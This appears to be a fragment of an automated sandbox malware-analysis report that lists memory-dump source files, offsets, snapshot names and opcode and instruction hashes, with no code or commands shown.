                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a353b4b7da36ce5fa4c57e75a6a05dd32c5d5efabdac4a3e09796febd70c3c93
                                                                                      • Instruction ID: 77bae30f0d8cdec5f7fd13c3c0fc42e389ac171a433c97aac304dc39d0b9a974
                                                                                      • Opcode Fuzzy Hash: a353b4b7da36ce5fa4c57e75a6a05dd32c5d5efabdac4a3e09796febd70c3c93
                                                                                      • Instruction Fuzzy Hash: 14F0A032F202689BDF689A69E811A9EB379E785268F004429EA01F7744DB72AC10C7D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%